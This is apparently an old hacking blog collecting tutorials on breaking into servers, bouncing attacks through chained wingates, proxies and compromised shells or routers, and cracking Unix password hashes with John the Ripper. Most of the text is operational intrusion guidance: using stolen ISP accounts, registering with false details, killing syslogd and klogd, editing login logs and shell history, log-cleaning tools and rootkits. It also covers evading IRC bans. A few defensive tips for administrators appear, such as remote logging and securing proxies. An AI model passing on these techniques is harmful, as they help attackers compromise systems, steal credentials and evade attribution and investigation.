This section needs to be further broken down into two catigories of script kiddies: ones who scan the net for a host that is vuln to a certain exploit and ones who search a certain site for any exploit. The ones you see on alldas are the first kind, they scan thousands of sites for a specific exploit. They do not care who they hack, anyone will do. They have no set target and not much of a purpose. In my opinion these people should either have a cause behind what they are doing, ie. "I make sure people keep up to date with security, I am a messanger" or "I am spreading a political message, I use defacments to get media attention". People who deface to get famous or to show off their skills need to grow up and relize there is a better way of going about this (not that I support the ones with other reasons ether). Anyways, the two kinds and what you need to know about them:

Scanning Script Kiddie: You need to know what signs of the hole are, is it a service? A certain OS? A CGI file? How can you tell if they are vuln? What version(s) are vuln? You need to know how to search the net to find targets which are running whatever is vuln. Use altavista.com or google.com for web based exploits. Using a script to scan ip ranges for a certain port that runs the vuln service. Or using netcraft.com to find out what kind of server they are running and what extras it runs (frontpage, php, etc..) nmap and other port scanners allow quick scans of thousands of ips for open ports. This is a favorate technique of those guys you see with mass hacks on alldas.

Targetted Site Script Kiddie: More respectable then the script kiddies who hack any old site. The main step here is gathering as much information about a site as possible. Find out what OS they run at netcraft or by using: telnet www.site.com 80 then GET / HTTP/1.1 Find out what services they run by doing a port scan. Find out the specifics on the services by telnetting to them. Find any cgi script, or other files which could allow access to the server if exploited by checking /cgi /cgi-bin and browsing around the site (remember to index browse)

Wasn't so hard to get the info was it? It may take awhile, but go through the site slowly and get all the information you can.

2. Getting In
Now that we got the info on the site we can find the exploit(s) we can use to get access. If you were a scanning script kiddie you would know the exploit ahead of time. A couple of great places to look for exploits are Security Focus and packetstorm. Once you get the exploit check and make sure that the exploit is for the same version as the service, OS, script, etc.. Exploits mainly come in two languages, the most used are C and perl. Perl scripts will end in .pl or .cgi, while C will end in .c To compile a C file (on *nix systems) do gcc -o exploit12 file.c then: ./exploit12 For perl just do: chmod 700 file.pl (not really needed) then: perl file.pl. If it is not a script it might be a very simple exploit, or just a theory of a possible exploit. Just do alittle research into how to use it. Another thing you need to check is weither the exploit is remote or local. If it is local you must have an account or physical access to the computer. If it is remote you can do it over a network (internet).

Don't go compiling exploits just yet, there is one more important thing you need to know

Covering Your Tracks
So by now you have gotten the info on the host inorder to find an exploit that will allow you to get access. So why not do it? The problem with covering your tracks isn't that it is hard, rather that it is unpredictable. just because you killed the sys logging doesn't mean that they don't have another logger or IDS running somewhere else. (even on another box). Since most script kiddies don't know the skill of the admin they are targetting they have no way of knowing if they have additional loggers or what. Instead the script kiddie makes it very hard (next to impossible) for the admin to track them down. Many use a stolden or second isp account to begin with, so even if they get tracked they won't get caught. If you don't have the luxery of this then you MUST use multiple wingates, shell accounts, or trojans to bounce off of. Linking them together will make it very hard for someone to track you down. Logs on the wingates and shells will most likely be erased after like 2-7 days. That is if logs are kept at all. It is hard enough to even get ahold of one admin in a week, let alone further tracking the script kiddie down to the next wingate or shell and then getting ahold of that admin all before the logs of any are erased. And it is rare for an admin to even notice an attack, even a smaller percent will actively pursue the attacker at all and will just secure their box and forget it ever happend. For the sake of arugment lets just say if you use wingates and shells, don't do anything to piss the admin off too much (which will get them to call authoritizes or try to track you down) and you deleting logs you will be safe. So how do you do it?

We will keep this very short and too the point, so we'll need to get a few wingates. Wingates by nature tend to change IPs or shutdown all the time, so you need an updated list or program to scan the net for them. You can get a list of wingates that is well updated at http://www.cyberarmy.com/lists/wingate/ and you can also get a program called winscan there. Now lets say we have 3 wingates:

212.96.195.33 port 23
202.134.244.215 port 1080
203.87.131.9 port 23

to use them we go to telnet and connect to them on port 23. we should get a responce like this:

CSM Proxy Server >

to connect to the next wingate we just type in it's ip:port

CSM Proxy Server >202.134.244.215:1080
If you get an error it is most likely to be that the proxy you are trying to connect to isn't up, or that you need to login to the proxy. If all goes well you will get the 3 chained together and have a shell account you are able to connect to. Once you are in your shell account you can link shells together by:

[j00@server j00]$ ssh 212.23.53.74

You can get free shells to work with until you get some hacked shells, here is a list of free shell accounts. And please remember to sign up with false information and from a wingate if possible.

SDF (freeshell.org) - http://sdf.lonestar.org
GREX (cyberspace.org) - http://www.grex.org
NYX - http://www.nxy.net
ShellYeah - http://www.shellyeah.org
HOBBITON.org - http://www.hobbiton.org
FreeShells - http://www.freeshells.net
DucTape - http://www.ductape.net
Free.Net.Pl (Polish server) - http://www.free.net.pl
XOX.pl (Polish server) - http://www.xox.pl
IProtection - http://www.iprotection.com
CORONUS - http://www.coronus.com
ODD.org - http://www.odd.org
MARMOSET - http://www.marmoset.net
flame.org - http://www.flame.org
freeshells - http://freeshells.net.pk
LinuxShell - http://www.linuxshell.org
takiweb - http://www.takiweb.com
FreePort - http://freeport.xenos.net
BSDSHELL - http://free.bsdshell.net
ROOTshell.be - http://www.rootshell.be
shellasylum.com - http://www.shellasylum.com
Daforest - http://www.daforest.org
FreedomShell.com - http://www.freedomshell.com
LuxAdmin - http://www.luxadmin.org
shellweb - http://shellweb.net
blekko - http://blekko.net

once you get on your last shell you can compile the exploit, and you should be safe from being tracked. But lets be even more sure and delete the evidence that we were there.

Alright, there are a few things on the server side that all script kiddies need to be aware of. Mostly these are logs that you must delete or edit. The real script kiddies might even use a rootkit to automaticly delete the logs. Although lets assume you aren't that lame. There are two main logging daemons which I will cover, klogd which is the kernel logs, and syslogd which is the system logs. First step is to kill the daemons so they don't log anymore of your actions.

[root@hacked root]# ps -def | grep syslogd
[root@hacked root]# kill -9 pid_of_syslogd

in the first line we are finding the pid of the syslogd, in the second we are killing the daemon. You can also use /etc/syslog.pid to find the pid of syslogd.

[root@hacked root]# ps -def | grep klogd
[root@hacked root]# kill -9 pid_of_klogd

Same thing happening here with klogd as we did with syslogd.

now that killed the default loggers the script kiddie needs to delete themself from the logs. To find where syslogd puts it's logs check the /etc/syslog.conf file. Of course if you don't care if the admin knows you were there you can delete the logs completely. Lets say you are the lamest of the script kiddies, a defacer, the admin would know that the box has been comprimised since the website was defaced. So there is no point in appending the logs, they would just delete them. The reason we are appending them is so that the admin will not even know a break in has accurd. I'll go over the main reasons people break into a box:

To deface the website. - this is really lame, since it has no point and just damages the system.

To sniff for other network passwords. - there are programs which allow you to sniff other passwords sent from and to the box. If this box is on an ethernet network then you can even sniff packets (which contain passwords) that are destine to any box in that segment.

To mount a DDoS attack. - another lame reason, the admin has a high chance of noticing that you comprimised him once you start sending hundreds of MBs through his connection.

To mount another attack on a box. - this and sniffing is the most commonly used, not lame, reason for exploiting something. Since you now how a rootshell you can mount your attack from this box instead of those crappy freeshells. And you now have control over the logging of the shell.

To get sensitive info. - some corperate boxes have alot of valueable info on them. Credit card databases, source code for software, user/password lists, and other top secret info that a hacker may want to have.

To learn and have fun. - many people do it for the thrill of hacking, and the knowledge you gain. I don't see this as horrible a crime as defacing. as long as you don't destroy anything I don't think this is very bad. Infact some people will even help the admin patch the hole. Still illegal though, and best not to break into anyone's box.

I'll go over the basic log files: utmp, wtmp, lastlog, and .bash_history
These files are usually in /var/log/ but I have heard of them being in /etc/ /usr/bin/ and other places. Since it is different on alot of boxes it is best to just do a find / -iname 'utmp'|find / -iname 'wtmp'|find / -iname 'lastlog'. and also search threw the /usr/ /var/ and /etc/ directories for other logs. Now for the explanation of these 3.

utmp is the log file for who is on the system, I think you can see why this log should be appended. Because you do not want to let anyone know you are in the system. wtmp logs the logins and logouts as well as other info you want to keep away from the admin. Should be appended to show that you never logged in or out. and lastlog is a file which keeps records of all logins. Your shell's history is another file that keeps a log of all the commands you issued, you should look for it in your $ HOME directory and edit it, .sh_history, .history, and .bash_history are the common names. you should only append these log files, not delete them. if you delete them it will be like holding a big sign infront of the admin saying "You've been hacked". Newbie script kiddies often deface and then rm -rf / to be safe. I would avoid this unless you are really freaking out. In this case I would suggest that you never try to exploit a box again. Another way to find log files is to run a script to check for open files (and then manually look at them to determine if they are logs) or do a find for files which have been editted, this command would be: find / -ctime 0 -print

A few popular scripts which can hide your presence from logs include: zap, clear and cloak. Zap will replace your presence in the logs with 0's, clear will clear the logs of your presence, and cloak will replace your presence with different information. acct-cleaner is the only heavily used script in deleting account logging from my experience. Most rootkits have a log cleaning script, and once you installed it logs are not kept of you anyways. If you are on NT the logs are at C:\winNT\system32\LogFiles\, just delete them, nt admins most likely don't check them or don't know what it means if they are deleted.

One final thing about covering your tracks, I won't go to into detail about this because it would require a tutorial all to itself. I am talking about rootkits. What are rootkits? They are a very widely used tool used to cover your tracks once you get into a box. They will make staying hidden painfree and very easy. What they do is replace the binaries like login, ps, and who to not show your presence, ever. They will allow you to login without a password, without being logged by wtmp or lastlog and without even being in the /etc/passwd file. They also make commands like ps not show your processes, so no one knows what programs you are running. They send out fake reports on netstat, ls, and w so that everything looks the way it normally would, except anything you do is missing. But there are some flaws in rootkits, for one some commands produce strange effects because the binary was not made correctly. They also leave fingerprints (ways to tell that the file is from a rootkit). Only smart/good admins check for rootkits, so this isn't the biggest threat, but it should be concidered. Rootkits that come with a LKM (loadable kernel module) are usually the best as they can pretty much make you totally invisible to all others and most admins wouldn't be able to tell they were comprimised.

In writting this tutorial I have mixed feelings. I do not want more script kiddies out their scanning hundreds of sites for the next exploit. And I don't want my name on any shouts. I rather would like to have people say "mmm, that defacing crap is pretty lame" especially when people with no lives scan for exploits everyday just to get their name on a site for a few minutes. I feel alot of people are learning everything but what they need to know inorder to break into boxes. Maybe this tutorial cut to the chase alittle and helps people with some knowledge see how simple it is and hopefully make them see that getting into a system is not all it's hyped up to be. It is not by any means a full guide, I did not cover alot of things. I hope admins found this tutorial helpful aswell, learning that no matter what site you run you should always keep on top of the latest exploits and patch them. Protect yourself with IDS and try finding holes on your own system (both with vuln scanners and by hand). Also setting up an external box to log is not a bad idea. Admins should have also seen alittle bit into the mind of a script kiddie and learned a few things he does.. this should help you catch one if they break into your systems.

On one final note, defacing is lame. I know many people who have defaced in the past and regret it now. You will be labeled a script kiddie and a lamer for a long, long time.

Hacking Techniques: Issue #2 - Bouncing Attacks

2007-12-02T01:28:00.000-08:00

. Getting info
-vuln scripts
-vuln services
-vuln people

1.99 Intro

2. Bouncing Attacks
-proxies
-wingates
-shells

2.5 Conclusion

(covered in future issue)

3. Once They Are In
-logs
-IDS
-Rootkits
-sniffers
-DDoS
-RootShell
-Deface

Intro
Welcome to the 2nd issue of Hacking Techniques. If you read the first one I am glad to see you liked it enough to want to read this one. This issue will focus on how hackers bounce their attacks so that they do not get caught and so they use the power of a *nix shell. As with the first one this tutorial can both be used by hackers and admins. Hackers will learn how to mount an attack and use proxies to help stay anonymous. Admins will learn how to prevent themselves from being used in an attack as a proxy and prevent stress. If you don't know what a proxy is or how to use a wingate you need to read this tutorial. People who run wingates, proxies, or give shells out also should go over this tutorial as to scare them into securing it. I'll go over a few other random things such as using routers as wingates, and using wingates to bounce your irc sessions.

Bouncing Attacks
There are a few ways to bounce your attack. Sometimes it depends on how you are gonna to do the attack, sometimes it depends on what you got on hand. I will introduce you to 3 ways to bounce you attack. I will not go into using routers as proxies since wingates are fairly easy to get. And I will not go over bouncing your attack off an ftp because all (or very close to all) ftp programs are patched to this by now. Not only should hackers read this next part, but so should admins who want to keep themselves from being used in an attack. Securing their proxies and wingates can help prevent trouble with hackers abusing it. This can save some time and hassle because you will not need to bother with an admin who trying to track down a hacker who used your network to bounce off of.

Bouncing through proxies

Bouncing through wingates

Bouncing and compiling the attack with shells

Bouncing through proxies
Proxies are the most basic way to stay anonomous while on the web. They are used with your web browser to rely data that you are downloading. So when you send data to get a webpage it is first sent to the proxy and then to the webpage. like this:

[your computer] -> [proxy] -> [website]

Some kinds of proxies, known as cache'ing proxies, will hold local copies of websites people visit. This makes browsing much faster since ideally the connection between you and the proxy is very fast. So instead of having to query the website the proxy will just send out the saved (cache'd) copy and save time and resources. Although this can be a problem as I have had first hand experience with this. When running lame industries we put a script up that allowed people to check out other users email addresses, image, website, names, country, etc.. all info was optional. But the script would check if you were an admin of lame industries and if you were it would display users passwords, cookies, allow you to change the status of users. Now somehow a nice fellow named MaAaX found a cache'ing proxy that had this page cached. Not only was it cache'd.. but it was the admin version cache'd. Some admin of the site must have used that proxy to visit that script, so the proxy saved what he saw. And MaAaX reported this, but he was tricked into reporting it to someone who was not an admin of the site. That person then used the proxy to get an admin's password from the cache'd page. Moral of the story? Don't leave sensitive info out for everyone to see, I would suggest not using a proxy when admining a site through http and also to put all scripts which can be used by an admin in a .htaccess protected directory.

Proxies are very easy to find and very easy to use. To find them try using a program called Proxy Hunter what this program will do is it will scan large ranges of ips for open proxies. Then it will report them to you so you can try them and see if they require a username and password or if you can use them without. Another way is to look on the web for lists of proxies, a few good sites for this are:

cyberarmy's proxy list

roswell's proxy list

Don't expect proxies to stay up forever, if one goes down try another. It is fairly simple to set up basic security for your proxy server, get a good access list restricting who can use it. Also, as with all programs, check for known security vulnerabilities in the proxy server itself, and vulnerabilities in your firewall, which you set the access list for the proxy server.

To use proxies you need to set up your browser to bounce off of them. In internet explorer this is done by going to Tools->Internet Options...->Connections->(highlighting your connection)->Settings...->check "Use a proxy server for this connection"->file in the ip or hostname and the port number then press ok, and ok.

To set up Netscape to use a proxy select edit->preferences->advanced->proxies->"Manual proxy configuration" then fill in the hostname or ip and the port number.

In lynx (or Mosaic) you would do this at the command line:

http_proxy="http://proxy.com:80/"; export http_proxy; exec lynx

or exec Mosaic.

Now to validate that the proxy is working go to a site which displays server environment variables from a perl/php script. One such site is http://www.cyberarmy.com/cgi/whoami.pl

One proxy is good for everyday surfing, but what if you are up to alittle more than just that? (I see that smile on your face) You need to use a technique called chaining proxies. What happends is you rely the data transfer from one proxy, to another, to another, to another ... until it reaches the destination. It is fairly simple to do this, but some proxies don't support it. Other problems include one proxy is slow it makes the connection timeout, too many proxies that the connection times out, and it takes awhile to find 4 or 5 good proxies. This should work in almost every browser, put the proxies in the address bar in this format: http://proxy.com:80/http://proxy2.com:80/http://proxy3.com:8000/http://site.com this should connect you to site.com using those 3 proxies and the one you put in your configuration (options, preferences.. what we just did above). I've also heard that using http://proxy.com;80-_-http://site.com works, but from my experience it tends to be less supported by proxy servers.

Now when I say proxies can be used to bounce a connection to a webpage - I mean webpage. You cannot use a normal http proxy on anything besides port 80 (the http port.. for webpages). If you want to bounce connections on other ports try a wingate .

So what if you are using an exploit to mount an attack and you are too lazy to use wingates to connect to your shell? You can use something like rain.forrest.puppy's libwhisker, which makes it extremely easy to add proxy support to perl scripts. You can get libwhisker at: http://www.wiretrip.net/rfp/bins/libwhisker/pr4/libwhisker.pm I haven't really looked for a C/C++ version of something like this, since it's just as simple to connect to a shell, but if anyone knows one please send info to b0iler@hotmail.com

One last thing I will go over for proxies is chaining them together, hackers use this so they have more cover when hacking into a script avalible over port 80. To do this you can put proxy1-_-proxy2-_-proxy3-_- before the url, or you can use a program called MultiProxy to chain anonymous proxies together. What is an anonymous proxy? It is a proxy that will not forward information about you. The main peice of information hackers want to keep secret is their IP address, when a proxy forwards this to a computer it is known as the X-Forward-For. It is a header in the packet which tells the target what computer the proxy is going to send the info to (the hackers IP). Anonymous proxies will leave the X-Forward-For header blank so that the target has no idea where the attack is comming from. You can check if a proxy is anonymous at http://www.cyberarmy.com/cgi/whoami.pl

Bouncing through wingates
Wingates are a type of proxy that allow you to make a telnet connection. They are intended to be used to allow computers to access the internet through another one, but since many types of wingates allow anyone to connect without a password this can be exploited by hackers and other people to be used to bounce their connection off of. Here is how this works:

[hacker's computer] -> [wingate] -> [destination]

This snazzy ascii shows how your data will go through a wingate and then to it's destination. So the destination sees it as if the data is coming from the wingate. If you can't see how hackers can use this to their advantage let me explain...

Hackers want to keep their ip hidden, they don't want their target to know where they are coming from. This is both so they cannot block the attack as easy and so they do not get in trouble if they do get caught. Using a wingate means that the target doesn't see the hackers ip, it sees the wingate's ip instead. Most hackers use over 3 wingates when hacking, just to be safe. Because if an admin caught the hack attempt and contacted the admin of the wingate logs can be used to find the hackers ip. So if they bounce off of like 5 wingates that means alot more hassle for the attacked admin to go through to find the hacker and the more chance that logs will not be kept or will be deleted by one of the wingate admins.

Bouncing hacking attacks off of a wingate is not the only reason a hacker would use one. They are also quite handy when going on some irc servers. The same basic concept applies, the data is bounced off the wingate and then sent to the destination (irc server). So the irc server sees the connection as comming from the wingate. This can allow hackers to get around channel bans, get around glines, hide themselves from others, create clones, etc.. Check your options in irc client to figure out how to use them. (with mirc it's known as a SOCKS 4 firewall in the options.)

Since they are useful on an irc, many people on irc tend to be using wingates. This is why I ported a simple port scanner to irssi (also works with BitchX and maybe Xchat). This port scanner is editted to only look for port 23 and 1080 the most commonly used ports for wingates, 23 is telnet, 1080 is SOCKS. What it does is collects people's ips when they enter a channel and then when you issue the command /scan it will check the list of ips for avalible wingates. There is also easy to use scripts for mirc that do this, a search on google for mirc wingate scanner produced many links. You can also use tools that scan wide blocks of ips for wingates using tools like wingate scanners . Here is a tip: find a cable or dsl isp and scan their subnet for wingates. Many people on fast connections use wingates for their network to split their bandwidth up and since cable they have a static ip they will not change as often. So do a '/whois user' on someone who is on cable to get their ip, then check all-nettols.com (use "smartwhois") to get their isp's ip range and I scan that for wingates.

Wingates tend to go up and down hourly, this is because sometimes people only need them for awhile and when someone does put one up they get alot of traffic from hackers using them to bounce off of, so instead of wasting their bandwidth they secure the wingate or take it down. Because of this you need to scan for wingates all the time. Another reason why irc works good for looking for wingates, you let other people find them for you. =)

Not many hackers just use 1 wingate when hacking. This is how using 4 wingates would work:

[hacker's computer] -> [wingate] -> [wingate] -> [wingate] -> [wingate] -> [destination]

Using multiple wingates is required for a hacker, they will not just use one, since it would be easy to track them. But using too many can make things very slow. Anything over 4 and under 10 would be normal.

So after you scan (this may take awhile, be patient) and get a few wingates how do you connect to them and use them? This is very simple, but tends to be asked all the time on message boards and chatrooms all over the place. When you telnet to a wingate you need to have it's ip or hostname and the port the wingate is running on. Normally the port is 23 or 1080. Now we can only use wingates which don't require a username and password to use. So after we get a list of them we will need to test and see which work without a login. Simply get out telnet and connect to that ip and port, wait for the connection and see if it says something like this:

Wingate>

If it had a login of some sort then you cannot use it. This is one way admins of wingates can protect themselves, make sure to password protect the wingate so random hackers cannot use it. Not only can hackers use your wingate, but spammers often use them aswell. Having spammers send thousands of emails through your wingate is a surefire way to get your isp to cancel your account. Besides adding passwords you can also secure your wingate by only allowing computers on your LAN to access it, this is how for GateKeeper :

login as Administrator on GateKeeper
Policies -> Default Policies -> Users can access services -> select everyone
Location -> Specify locations from where this recipient has rights ->
add 127.0.0.1 and 192.168.0.* (or whatever ip range your network uses).

To secure Deerfield's wingate simply upgrade to 3.x home version. The home version of 3.x doesn't let anyone connect at default. It's now configured securely by default :D

There are also other terminal's that will appear, it is not allways "Wingate>". It could be anything, Wingate> is just default on some.

We got connected, now to use the wingate. Wingates by default will telnet to any ip port you enter, so try to telnet to a server you know is up:

Wingate> 204.42.253.18:23

Now if you encounter an error this means somethings ether wrong with the ip:port you entered, the ip:port is down, or the wingate is not working. Also try to do 'telnet ip:port' since that wingate might not telnet at default. So we got our list of wingates down to a list of working, none passworded wingate. Now to link them. Lets say we have the wingates (note, these are fake):

203.43.25.104 port 23
214.133.200.20 port 1080
180.23.56.93 port 23
194.51.107.68 port 23

To link these we would telnet into the first one:

telnet 203.43.25.104 23
Sparky's server 1.03>

Then enter in the ip:port of the next one on the list.

Sparky's server 1.03> 214.133.200.20 1080
CDD Proxy Server>

and link the rest..

CDD Proxy Server> 180.23.56.93 23
welcome to 180.23.56.93: 194.51.107.68 23

Now A hacker can telnet into a shell account from the last wingate and launch the attack, or if they know how to do some socket programming they can set up exploits to go through wingates themselves. For the next section , shells , I'll go over how a hacker can use a shell to make his attack.

I have heard from a few people that routers can be used as a wingate, I myself have never done this since there is always plenty of wingates to use if you just scan for them. But.. using a router as a wingate is very interesting for a number of reasons. First, a router gets so much traffic that the admin would probably not know if it was being used to bounce an attack. Routers don't log by default, and since they get alot of traffic not many admins log everything (or they're logs do not last too long) this means there is less of a chance of the hacker getting tracked down. Routers are pretty much always up and have a fast connection, so if you got a few routers going as wingates you wouldn't have to scan for new ones as much =)

Now don't go out looking for routers just yet, before you can use a router as a wingate you need to have access to use telnet on it. Unlike wingates which can sometimes allow anyone to run telnet, routers don't. You will need to hack into the router to beable to use telnet on it to wingate from it. Of course the number of routers with default passwords (admin:admin) or simple exploits not patched is pretty high from my experience. Also to note: it might not be a good idea to telnet directly into a router as your first wingate.. if the admin does find out of your break in (and they log) you will have left your real ip. Hackers will probably use a regular wingate or two before connecting to a comprimized router. Needless to say, if you admin a router make sure to keep it locked up tight, not only can hackers screw up your network, sniff passwords, redirect data, and generally cause a muck, but they can also use your router as a launching pad for their next attack.

Another use for wingates is to use them to bounce a connection off of irc. Most commonly SOCKS (stands for SOCK-et-S), are used for irc, they are very simular to wingates but used mainly at a firewall to allow transparent connections through it. SOCKS usually run on port 1080. To bounce your connection to an IRC server with a wingate or SOCKS type the following in your irc client:

/server win.gate.com 23
/quote irc.box.sk 6667
/quote user grendelsucks 123.123.123.123 b0iler :ban evader
/quote nick b0iler2

then use irc like normal, you will have the ip or hostname of the wingate. I believe if you use mirc you can go to File -> Options -> Connect -> Firewall and then enter in the wingate's IP and port and checking "Use SOCKS Firewall" (correct me if I am wrong). If you use Xchat try Settings -> Setup -> IRC -> Proxy Server -> Fill in IP and port and select the type as wingate. You can also use a bnc (stands for BouNCe) to rely your connection to an IRC server.

Same as with proxies, if you don't want people connecting to your wingate set up a strict access list on a firewall. Also username and passwords are a good idea when it comes to wingates.

Shell Accounts
A shell account is having access to a remote computer. Users can connect to them and issue commands just like if they were at that computer's keyboard. This also means that hackers can issue commands, and they often use shell accounts as another way to bounce their attack.

Usually a shell account is used along with wingates and is used by the hacker to launch the attack. Hackers will not use free shells such as nether.net or hobbiton.org because they do not have the ablity to run programs they need and they cannot delete the log files with a regular user account. If they were to use one of these shells the admin could easily check the logs and see what they were upto. So hackers will use what are known as root shells, these are systems the hacker has already comprized and has root on them. This allows them to delete all nessasary logs of their attack and lets them have full access to *nix tools. The key tools hackers need are raw packet support, nmap and other auditting programs, a c compiler, a perl interpreter, and exploits. These come standard on most *nix boxes, so it makes *nix very valuable to hackers. Although most will have *nix installed on their computer they might still use shells because they have faster connections, and will allow another layer of protection along with the wingates.

This is an example of how a hacker would use 3 wingates with 2 shells:

[hacker's computer] -> [wingate] -> [wingate] -> [wingate] -> [shell] -> [shell] -> [target]

To login to the shells a hacker can use telnet or they can use ssh , whichever they want. ssh will allow a more secure connection. A simple: telnet owned.com:5742 would allow them to get in (if they set up telnetd on port 5742). To connect with ssh is: ssh owned.com -p 5742. If your system would get comprized it too could be used as a shell for the hackers next attack.

There are free shell accounts for beginner hackers to use, again, I stress that these are closely monitored and you only get a user account, so things are logged and power is limitted. Don't use them to hack! What a hacker wants is a 'rootshell' which is root access. This allows the hacker total control over everything on that computer. Raw sockets is a big thing, access to edit logs is another. If you can edit the logs on a rootshell this means that it is all the more harder for anyone to track you. If you use a free shell or a user account on a box you cannot edit the logs and will be vulnerable to be traced. Always using alot of wingates will help in keeping you out of trouble.

Most shells you will want are on *nix boxes, so you need to learn unix commands. Also knowing what files do what will help you understand how to hide yourself and how to modify the system the way you want. Setting up linux and securing your box will help you better understand how to break in, as well as breaking into linux will help you better understand how to secure it =) To help you learn *nix here is a few really good tutorials:

http://unixhelp.ed.ac.uk - A very easy and detailed step by step guide to getting started with Unix, with examples, solution to problems, and some cool facts.

http://www.mines.utah.edu/~wmgg/ - A short and sweet Unix tutorial to help with the basic commands.

http://www.belgarath.demon.co.uk/guide/ - A very nice guide that takes things slow and uses helpful pictures to explain things.

http://www.linuxnewbie.org - A very helpful stop for anyone new to linux, it has many helpful files.

Here's a good one

And another

More free knowledge

read one of these!

Unix links

How can you stop hackers from using your system? Well this is a very indepth question, because you will need to completely secure your box to stop them from gaining access to it. Read up on Unix security, firewalls, and IDS. Ofcourse take action before the hacker gets in, secure your box... use tripwire and snort 'just incase'. One way to catch them is to install a remote logging box. This will allow you to have logs of everything they do, to do this set up any old box with inetd and syslogd and then change syslog's configuration file to have logs sent to that box.

# /etc/syslog.conf file
*.* @213.165.52.61

For more info on setting up a secure remote logger try loki's guide on How to set up a secure remote logger

One thing I would like to stress about using shells from a friends box is that they may be logging everything you do and gathering your username:passwords to your email, hacked accounts, sites, ftp, nickserv, and anything else you transfer. Same holds true for BNCs and wingates. It's a trick passed around by many hackers to put a wingate on their box and put it on a hacker website's list and wait for people to log into their hacked accounts with it. I also read somewhere that governments set up wingates to catch hackers, I don't know how true this is.. but it sure is a good way to discurage hackers.

Conclusion
In this issue of Hacking Techniques I went over how and why hackers use proxies, wingates, and shells when attacking and how admins can stop them from using their networks to bounce attacks from. I think the next issue will be much longer, it will cover many things hackers do once they comprize a system. I hope everyone learned atleast something from this paper, and I hope I didn't forget anything =) I am sorry if you felt it was hard to read this tutorial, I had a hard time writting it, it just felt like my words didn't go together right. It may be awhile till I get around to finishing issue #3, thanks for your patients.

Cracking unix password files

2007-12-02T01:25:00.001-08:00

1) First thing's first

--------------------------------------------------------------------------------

I guess you're a newbie in pass-cracking like I was and you've probably started John the Ripper full of enthusiasm, and got.... nothing. So the first thought you have is 'my god this must be hard, and I'm a newbie'. Forget it!!! You're always a newbie, and we all are... in pass cracking world, pardon, pass recovering world (or any world else) you always have something to learn. Sometimes, even if you are experienced in password cracking, you won't be able to crack the password or even get your own password. This is a pure technical manual and will give you only the recipe for cracking, but every password needs different approach...

OK, so a good way to get somewhere is to start getting somewhere...
What you're about to learn is to crack *nix(Unix/Linux/etc.) password files. It does not mean that you need to have some Unix distribution on your box, but it means you'll have to stop clicking your ass off all around the screen... 'What this fool is trying to say', you'll probably ask... This fool is trying to say that john is a DOS program (there is also Linux/Unix version, but I guess that most of the people that read this tutorial have win boxes). I will try to put this tutorial through the examples so it wouldn't look like a boring script with incredible amount of switches. After reading this text it wouldn't be a bad idea to look at the texts you get with John. I learnt it all from there, but that, of course, was the hard way, and you want the easy way, right? Right.

First, it wouldn't be a bad idea to get yourself John the Ripper, I guess... if you don't have it you can find it at:

1) packetstorm.securify.com (look at archives, password cracking)
2) neworder.box.sk (do some searching by yourself)

John can be found practically anywhere. For example: try going to altavista.com and running a search for 'john the ripper'.

Second thing you'll need is.... a HUUUUGE amount of password dictionaries (I'll explain what these are in a minute). The best dictionary around is at www.theargon.com and packetstorm (look at the archives) and is called theargonlistserver1 and is about 20Mb packed, and over 200Mb
unpacked... get it!!!! The people at theargon did a terrific job.

You should also get some smaller dictionary files (I'll explain why later).

2) Do we look like *nix?

--------------------------------------------------------------------------------

So now you have john, loaded with that huuuuge pass dictionary, and you think that you can crack anything... If you plan to live for 100000 years, that wouldn't be a problem, but you only have some 80 years left in the best case scenario (unless, of course, scientists find a way to... oh, nevermind).

Now, the first thing is that you have to make sure your password file really looks like a Unix password file (were talking about the /etc/passwd file).

Let's see how Unix pass files look like

owner:Ejrt3EJUnh5Ms:510:102:Some free text:/home/subdir/owner:/bin/bash

The important part is the username and the encrypted password, which are the first and the second parts (each line is divided into seven parts by : symbols)

owner:Ejrt3EJUnh5Ms

Owner is the username and 'that other thing' is the crypted password (encrypted in altered DES (Data Encryption Standard) encryption). For the other part you can put anything that looks like that but the structure must be same so the john could recognize it as unix pass. In fact the other part

:510:102:Some free text:/home/subdir/owner:/bin/bash

Is just some information about the user, his home directory, etc...

Sometimes you'll have passes that have only the first and second part, such as password files that you got from a webboard running matt's web board script.

owner:Ejrt3EJUnh5Ms

You'll have to put the other part so that password would look like unix pass, and you can do a copy-paste from another pass, you can even use

:510:102:His name:/home/subdir/owner:/bin/bash

What you have now should look like:

owner:Ejrt3EJUnh5Ms:510:102:His name:/home/subdir/owner:/bin/bash

Hell, you can even put

owner:Ejrt3EJUnh5Ms:a:a:a:a:a

It won't matter to john at all.

3) We're getting somewhere... nowhere

--------------------------------------------------------------------------------

Now you're ready to crack. Type in

john -w:words.lst password.file

Where words.lst is password dictionary and password file where you have your password or passwords. If you use it on example i gave to you you'll probably get password because it's really weak pass. You'd be surprised to see that people usually use really weak passes like their names, pet names, or even their username (for example: username=zalabuk, password=zalabuk).

Hint: Don't be stupid! Use strong passes like

p4sswr!@
p@s$w11s
with as many characters you can remember. Hint is to use special characters and numbers those passes are much harder to crack (I'll explain why in a minute).
The other hint is to use passes as long as you can remember, 8 characters are sometimes not enough... it depends what box that someone who cracks has... on dual alpha is certainly not enough... in other words... more than 10 characters will do fine, even more wouldn't hurt (like 16...). By the way, older *nix have fixed pass length of 8 chars... that is old DES crypted pass that uses a 64-bit key... now there are 128-bit keys, and some perverts use even more, so there is more fun now :)

john -w:words.lst password.file

Wait wait wait! What am I doing here?
Alright, listen up carefully. The DES encryption that Unix uses CANNOT be reversed. Some encryptions can be reversed using a sometimes simple or sometimes incredibly complicated algorithm (in the 3rd century AD, Ceasar used to send encrypted letters which used a formula of "shift by three", which means that d stands for a, e stands for b etc'. At that time, such an algorithm was just fine. Today, it isn't).
So anyway, the altered DES encryption that Unix uses for it's password files cannot be reversed. Why? Because it's a key-based encryption. The encryption algorithm uses a bunch of letters (lowercase and uppercase), numbers and symbols within the algorithm. So, in other words, to run the decryption algorithm you will need this key, which you simply cannot just have, because the key is the password! You see, when a user picks a password, the system generates an encrypted password for him, called a hash (which is what you get when you somehow acquire a password file), which is created by running this altered DES algorithm using the user's password as a key. If you try to decrypt the password using standard reversable DES encryption, you get a null string.
So how do John and other password crackers do it? Easy. They try to recreate this process by taking passwords out of these dictionary files (or wordlists) and using them as keys for this altered DES algorithm process. Then, they compare the result to all the encrypted passwords within the password file you've given them. If the two strings match - there you have it! The password is yours!

If the first step doesn't work, the next step would be to do this:

john -w:words.lst -rules password.file

